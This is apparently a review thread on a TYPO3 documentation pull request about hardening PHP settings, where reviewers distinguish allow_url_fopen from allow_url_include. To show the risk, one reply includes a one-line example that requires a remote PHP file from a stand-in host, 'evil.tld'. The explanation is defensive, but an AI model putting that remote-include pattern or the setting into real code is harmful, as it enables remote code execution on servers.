Documentation/Security/GuidelinesAdministrators/FurtherActions.rst.txt

```diff
@@ -27,11 +27,14 @@ Due to the fact that TYPO3 is a PHP application, secure PHP settings
 are also important, of course. PHP settings, such as `open_basedir`,
 `disable_functions` often improve the security of your system and should be considered.
 
-Note that disallowing remote connections (e.g. by deactivating
-`allow_url_fopen` or by blocking outgoing traffic on a firewall in
+Note that disallowing remote connections (e.g. by blocking outgoing traffic on a firewall in
 front of the TYPO3 server) may have an impact on the retrieval of the
 TYPO3 extension list, which allows you to check if extension updates
-are available!
+are available, or on retrival of translation files.
+
+In general it is advisable to set php.ini settings `allow_url_fopen` and `allow_url_include` to false.
+However if your php-setup comes without support for curl then setting these values to true
```

Comment:
never suggest setting allow_url_include to true. It is never required for any functionality TYPO3 provides and is potentially harmful to allow

Reply:
hi @helhum thx for your feedback. I am with you and will update the PR accordingly.

However I found composer install to fail with allow_url_include = false! :-<

so the composer command get's more complicated 

```
php -d allow_url_fopen=on /usr/bin/composer install ...
```

as I very much dislike to have separate php setting for cli and apache/(f)cgi

Is composer failing here or is something broken on my side?

Reply:
> However I found composer install to fail with allow_url_include = false!

I don't think so.

> `php -d allow_url_fopen=on /usr/bin/composer install`

Watch out: `allow_url_fopen` !== `allow_url_include`

Reply:
`allow_url_fopen = 1` allows for:

```php
file_get_contents('https://domain.tld/url/');
```

That's fine!


`allow_url_iclude = 1` allows for:

```php
require 'https://evil.tld/url/rce.php';
```

That's **not** fine!

Reply:
> > However I found composer install to fail with allow_url_include = false!
> 
> I don't think so.

Can you please give it a shot? It puzzled me as well but it was my finding.

> > `php -d allow_url_fopen=on /usr/bin/composer install`
> 
> Watch out: `allow_url_fopen` !== `allow_url_include`

Thx :-> didn't read your first comment well enough. update PR